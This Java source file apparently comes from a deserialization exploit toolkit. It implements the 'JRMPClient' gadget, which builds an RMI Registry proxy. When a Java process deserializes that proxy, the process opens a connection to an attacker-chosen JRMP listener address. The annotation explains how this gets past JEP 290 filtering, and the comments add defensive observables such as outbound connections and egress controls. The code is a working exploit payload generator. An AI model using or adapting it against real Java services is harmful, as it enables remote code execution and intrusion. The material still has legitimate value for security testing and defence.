package com.ar3h.chains.gadget.impl.javanative.jdk;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;

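/**
 * Gadget that builds the "JRMPClient" payload described in the annotation below: a
 * {@link Registry} dynamic proxy whose {@link RemoteObjectInvocationHandler} wraps a
 * {@link UnicastRef} / {@link LiveRef} pointing at {@link #address}.
 *
 * <p>This class performs no network I/O itself; it only parses {@code address} and
 * assembles objects. Any connection to the configured listener happens in the JVM
 * that later deserializes the returned proxy (the annotation description records the
 * relevant deserialization path, {@code sun.rmi.transport.StreamRemoteCall#executeCall}).
 *
 * <p>Review note: from a defensive point of view the observable is an outbound TCP
 * connection to a {@code host:port} that the deserializing process had no business
 * contacting, made right after untrusted data was deserialized. A JEP 290
 * {@code ObjectInputFilter} on the deserializing side and egress restrictions are the
 * controls that stop this payload; the gadget is independent of the classpath beyond the JDK.
 */
@GadgetAnnotation(name = "JRMPClient", description = "java.rmi.server.RemoteObjectInvocationHandler\nJEP290（8u121）默认只为RMI注册表（RMI Register层）和RMI分布式垃圾收集器（DGC层）提供了相应的内置过滑器，但是最底层的JRMP是没有做过滤器的, 所以可以绕过 JEP290JRMPClient 反序列化漏洞点: sun.rmi.transport.StreamRemoteCall#executeCall\nJRMP客户端反序列化顺序: \n\n1. 反序列化服务端给的returnType\n2. 反序列化服务端给的一个ID\n3. 反序列化服务端给的报错信息(Payload位置)", dependencies = {"jdk < 8u121"}, authors = {Authors.MBECHLER})
@GadgetTags(tags = {Tag.JavaNativeDeserialize, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/jdk/JRMPClient.class */
public class JRMPClient implements Gadget {

    /** Listener address in {@code host[:port]} form; the port part is optional. */
    @Param(name = "JRMPListener Address", description = "eg: 127.0.0.1:1234")
    public String address = "127.0.0.1:1234";

    /**
     * Builds the payload object.
     *
     * <p>{@link #address} is split at the first {@code ':'}. Without a separator the
     * whole string is the host and a random port in {@code [0, 65534]} is chosen,
     * preserving the previous behaviour. With a separator the remainder must be a
     * decimal integer and is now additionally checked to lie in {@code [0, 65535]},
     * because {@link TCPEndpoint} itself stores whatever value it is given.
     *
     * @return a {@link Registry} proxy backed by a {@link RemoteObjectInvocationHandler}
     * @throws NumberFormatException if the text after {@code ':'} is not a decimal integer
     * @throws IllegalArgumentException if the parsed port is outside {@code [0, 65535]}
     * @throws Exception propagated from the proxy/RMI constructors
     */
    public Object getObject() throws Exception {
        int separator = this.address.indexOf(':');
        String host;
        int port;
        if (separator < 0) {
            // No explicit port: keep the historical random choice (nextInt(65535) -> 0..65534).
            host = this.address;
            port = new Random().nextInt(65535);
        } else {
            host = this.address.substring(0, separator);
            // parseInt has the same parsing rules as the former Integer.valueOf(...).intValue().
            port = Integer.parseInt(this.address.substring(separator + 1));
            if (port < 0 || port > 65535) {
                throw new IllegalArgumentException("port out of range [0, 65535]: " + port);
            }
        }
        // The ObjID only needs to be some value; the handler never dereferences it locally.
        ObjID objId = new ObjID(new Random().nextInt());
        TCPEndpoint endpoint = new TCPEndpoint(host, port);
        LiveRef liveRef = new LiveRef(objId, endpoint, false);
        RemoteObjectInvocationHandler handler = new RemoteObjectInvocationHandler(new UnicastRef(liveRef));
        // The return type is Object, so the former (Registry) cast added nothing; the proxy
        // still implements Registry via the interface array.
        return Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[]{Registry.class}, handler);
    }

    /**
     * Chain entry point; the context and chain are not consulted, the payload depends
     * only on {@link #address}.
     *
     * @param gadgetContext unused
     * @param gadgetChain unused
     * @return the object from {@link #getObject()}
     * @throws Exception whatever {@link #getObject()} throws
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}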
